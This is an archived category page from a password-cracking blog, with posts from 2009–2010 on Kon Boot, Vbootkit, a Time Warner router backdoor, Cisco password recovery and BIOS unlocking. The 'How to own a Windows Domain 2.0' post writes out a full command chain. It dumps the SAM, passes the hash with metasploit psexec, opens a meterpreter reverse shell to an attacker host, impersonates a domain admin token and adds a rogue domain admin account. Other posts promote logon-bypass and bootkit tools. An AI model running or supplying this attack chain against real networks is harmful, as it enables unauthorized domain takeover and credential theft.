What's My Pass? » Privilege Escalation

Kon Boot 1.1

Dev Team — Mon, 10 May 2010 09:08:13 +0000

We reviewed Kon Boot 1.0 last year HERE which was a great breakthrough program that allowed you to boot into a Windows machine and bypass the logon screen without entering a password. To accomplish this, Kon Boot hooks the bios on the fly subverting the Windows kernel authentication temporarily and allowing you access. Since this is a temporary process the computer is back to normal when you reboot. This allowed you to access the computer without having to take the time to reset the password or crack it, and it left the computer untouched. Now, a year later, Kon Boot v1.1 has been released with new features, such as booting from floppy,CD, or usb, privilege escalation support which allows you to gain SYSTEM privileges from ANY account on the system. For example, you can boot from Kon Boot and log in as Guest and run ‘Net User’ command to add a new user,reset admin passwords etc as SYSTEM

It also has a bunch of new bug fixes/updates.

- Added 64-bit environment support
- Added USB support tools (grldr, klmemusb)
- Added debugging code to make it easier to track down various compatibility problems
- Fixed bug in Windows 7 support failures
- Removed Linux support
- Many performance improvements to source code
- Improved BIOS support by reducing code size significantly

Unfortunately it is no longer free. But for a meager price of $15.99 for a personal license, it gives you free updates and support for a period of 6 months. You can still use it without restrictions after that period.
They also offer a commercial license, for $75.99 with 1 year of support and updates, allowing you to use on business environment.
To purchase Kon Boot v1. 1,visit their website http://www.kryptoslogic.com

We are also giving away 10 personal licenses this week to some lucky readers!!! More details to come!!!

How to own a Windows Domain 2.0

Dev Team — Sat, 20 Feb 2010 16:42:22 +0000

Back in October we showed you a video on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit.



The commands used in the video:

mount /dev/sda1 /mnt/sda1 cd /mnt/sda1/WINDOWS/system32/config samdump2 system SAM msfconsole use windows/smb/psexec exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123...:5654... -j sessions -i 1 use incognito list_tokens -u impersonate_token mydomain\\domainadmin execute -f cmd.exe -i -t net user hack MPass5678 /add /domain net group "Domain Admins" hack /add /domain PWNED
Lessons learned :
1. never reuse admin passwords, even if they are technically unbreakable
2. everything is a lot easier with the right tools.

Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7

Droid and Iphone lock-screen gesture passwords bypass

Dev Team — Thu, 18 Feb 2010 19:11:27 +0000

You know the lock-screen gesture protection used on Iphone/Android smartphones to prevent people from picking up your phone and having immediate access to all your personal information? Right, well, I hope you’re not relying on your phone’s swipe gesture protection to keep all your dirtiest secrets from falling into the wrong hands.
The next image is a good example of how easy it is to circumvent the Nexus One’s lock-screen gesture password.

So be wary fastfood workers

RockYou got rocked

Dev Team — Tue, 15 Dec 2009 18:32:40 +0000

Seems like Myspace addon on site rockyou.com fell victim to sql injection flaw and exposed more than 32 millions of passwords in plaintext.
http://igigi.baywords.com/rockyou-com-exposed-more-than-32-millions-of-passwords-in-plaintext/

How to own a Windows Domain

Dev Team — Sun, 25 Oct 2009 17:34:05 +0000

Security tube has a nice video on how to gain domain admin access from a workstation using some simple tools

http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx

Time Warner Cable SMC8014 Modem/Router Remote Access

Dev Team — Wed, 21 Oct 2009 19:08:44 +0000

A backdoor vulnerability in a Time Warner cable modem and Wi-Fi router deployed to 65,000 customers would allow a hacker to remotely access the device’s administrative menu over the web, and potentially change the settings to intercept traffic, according to a blogger who discovered the issue.
David Chen, said he was trying to help a friend change the settings on his cable modem and discovered that Time Warner had hidden administrative functions from its customers with Javascript code. By disabling Javascript in his browser, he was able to see those functions, which included a tool to dump the router’s config file.

That file, it turned out, included the administrative login and password in cleartext. Chen investigated and found the same login and password could access the admin panels for every router in the SMC8014 series on Time Warner’s network , given that the routers also expose their web interfaces to the internet.

Src: chenosaurus.com

Vbootkit 2.0 is now open-source

admin — Fri, 08 May 2009 14:43:40 +0000

Vbootkit 2.0 has now been made open-source under GPL license.

Indian security researchers have released proof-of-concept code that can be used to take over a computer running Microsoft’s upcoming Windows 7 operating system, despite earlier promising not to make the code public for fear it could be misused.

VBootkit 2.0 was developed by researchers Vipin Kumar and Nitin Kumar and is now available for download under an open-source license.
Vbootkit 2.0 currently only works on Windows 7 ( x64 edition ).

Download Vbootkit 2.0 source code

Vbootkit 2.0 Attacking Windows 7 (x64) via Boot Sectors presentation

VIA: nvlabs.in

Recovering Passwords on a Cisco Router

admin — Thu, 07 May 2009 03:54:17 +0000

Password recovery is a fairly frequently used procedure for administrators and engineers. Even though we usually stack our passwords in some word, excel or text file, it’s very easy to forget to update them when changes occur. The end result is you find yourself locked out of the device, wondering what on earth could be the password.
Accessing a Cisco router requires certain privileges. Depending on the router’s configuration, you might be required to firstly log into the router and then enter the popular ‘enable’ password to elevate your access to privileged mode, from where you can issue configuration commands.

This article will show you how you can gain full administrator access to a Cisco router, bypassing all security passwords. The password recovery process, however, can be rendered useless if the administrator has previously configured the router not to allow this process to take place. In this case, the router will warn the user and, if he proceeds, all configuration will be erased, so there will be nothing to recover!

Example Scenario

Consider we have a Cisco router (2610 for our example – this procedure is the same for all routers) and we are unable to access it due to a lost password. Console and VTY (telnet) sessions ask for a password which we do not have:

R1 con0 is now available
Press RETURN to get started.

User Access Verification

Password: *****
Password: ********
Password: ***
% Bad passwords

Even if we were able to successfully log into the router, but couldn’t provide the router with the correct ‘enable’ password, we would still need to perform a password recovery procedure.

To initiate the password recovery procedure, connect the rollover cable to the console port, then power the router off and back on. As soon as you receive a prompt showing the boot process, hit Ctrl-Break:

System Bootstrap, Version 11.3(2)XA4, RELEASE SOFTWARE (fc1)
Copyright (c) 1999 by cisco Systems, Inc.
TAC:Home:SW:IOS:Specials for info
PC = 0xfff0a530, Vector = 0×500, SP = 0×680127c8
C2600 platform with 65536 Kbytes of main memory

program load complete, entry point: 0×80008000, size: 0xf54134
PC = 0xfff0a530, Vector = 0×500, SP = 0×83fffe68

monitor: command “boot” aborted due to user interrupt
rommon 1 >

You’ll immediately see the ‘rommon’ prompt, indicating we are in ‘rom monitor’ mode. This is a mini-IOS that allows you to perform very specific tasks in order to recover your router.

Now, to skip our password-protected configuration, we instruct the router to by-pass the configuration located in NVRAM during bootup, and reset the router:

rommon 1 > confreg 0×2142

You must reset or power cycle for new config to take effect
rommon 2 > reset

The router will now reset and start its normal bootup process, however, the current configuration will be ignored. When the bootup is complete, you will be prompted to ‘enter the initial configuration dialog’, answer ‘no’:

System Bootstrap, Version 11.3(2)XA4, RELEASE SOFTWARE (fc1)
Copyright (c) 1999 by cisco Systems, Inc.
TAC:Home:SW:IOS:Specials for info
C2600 platform with 65536 Kbytes of main memory

program load complete, entry point: 0×80008000, size: 0xf54134
Self decompressing the image : ##

— System Configuration Dialog —

Would you like to enter the initial configuration dialog? [yes/no]: no

Press RETURN to get started!

Next step is to enter ‘Privileged Mode’ and load the router’s configuration from nvram. Then reset the ‘enable’ or ’secret’ password. To be sure, we’re showing how to reset both, but we’ll only need to use the ’secret’ password. In addition, we are going to reset the console port’s password:

Router>
Router> enable
Router# copy startup-config running-config
Destination filename [startup-config]? (hit enter)
Building configuration…
[OK]
Router# configure terminal
Router(config)# enable password cisco
Router(config)# enable secret enter
Router(config)# line console 0
Router(config-line)# password hello
Router(config)# username admin password enternow

If you use the ‘login local’ command you’ll need to reset the user account of the password you have lost (in our example, it’s ‘admin’).

Lastly, we need to change the ‘configuration register’ so the router will load the newly modified configuration next time it reboots, save our settings and reboot the router:

Router(config)# config-register 0×2102
Router(config)# exit
Router# copy running-config startup-config
Destination filename [startup-config]? (hit enter)
Building configuration…
[OK]
Router# reload

The router will now reload and use the new configuration that contains the newly set passwords.

When the router reboots, log in and check your configuration. If you find any interfaces in the ’shutdown’ state, you’ll need to use the ‘no shutdown’ command to bring them back up. Again, don’t forget to save your configuration!

Article Summary

We’ve shown you how to recover lost passwords and gain control of a Cisco router. Of course there are mechanisms, which can be enabled, that will not allow you to perform the password recovery procedure. In this case, any attempt to recover the passwords or configuration will result in the erasure of the device’s configuration!

Via: firewall.cx

Spunlock BIOS Cracking Services

Dev Team — Wed, 29 Apr 2009 22:44:38 +0000

Over this past week I had a job come in the shop of a Sony Vaio laptop that had a bad motherboard. I had searched on Ebay for a cheap buy and settled on someone who had the same motherboard for about $100 less than anyone else. When I received the motherboard I promptly installed it , upon powering it up I was faced with a password prompt. Dammit! The motherboard had a BIOS password that wasn’t mentioned in the auction. Now being that I know most known methods for bypassing BIOS passwords, Sony has no known method of removing the password. I talked to a few friends and was forwarded to http://spunlock.com .

I was a bit weary at first about paying for a service , but the customer needed their laptop back that day to go on a trip. So getting the customer’s O.K. I purchased the BIOS cracking service.In order to get the correct challenge response BIOS code for most laptops you needs to enter the password incorrectly 3 times, after the third time , the BIOs should spit back a challenge code, this is what they need in order to crack the code.

After sending the payment and challenge code,much to my amazement 1 1/2 hours later I was opening an email with my code to remove the BIOS password. I punched it in and I was now watching Windows starting up. Spunlock has BIOS cracking support for many laptop brands like Dell,Fujitsu,Sony (of course) and more. So for you Techs and others who got burned on ebay, or people who simply forgot their password , give them a shot, you have nothing to lose, Don’t forget to mention whatsmypass.com in your email to them

ACER:SOME
ADVENT:SOME
ASUS:SOME
COMPAQ:SOME
DELL:ALL + 2A7B
E-SYSTEM:SOME
FUJITSU SIEMENS:ALL
HP:SOME
PACKARD BELL:SOME
PHILLIPS:SOME
SAMSUNG:SOME
SONY VAIO:ALL
TOSHIBA:SOME

Vbootkit 2.0

Dev Team — Sat, 25 Apr 2009 15:03:09 +0000

Like Kon-boot we talked about in our last post VBootkit 2.0 is an updated code from 2007 that hasnt hit the internet yet , but is pretty much the same idea, modify the bootmgr and you essentially can modify the security checks on the fly to let you do anything you wanted on the system as any user without knowing the password. Read more from there authors site ::HERE::

VBootkit 2.0 is a follow-up to earlier work that Kumar and Kumar have done on vulnerabilities contained in the Windows boot process. In 2007, Kumar and Kumar demonstrated an earlier version of VBootkit for Windows Vista at the Black Hat Europe conference.

The latest version of VBootkit includes the ability to remotely control the victim’s computer. In addition, the software allows an attacker to increase their user privileges to system level, the highest possible level. The software can also able remove a user’s password, giving an attacker access to all of their files. Afterwards, VBootkit 2.0 restores the original password, ensuring that the attack will go undetected.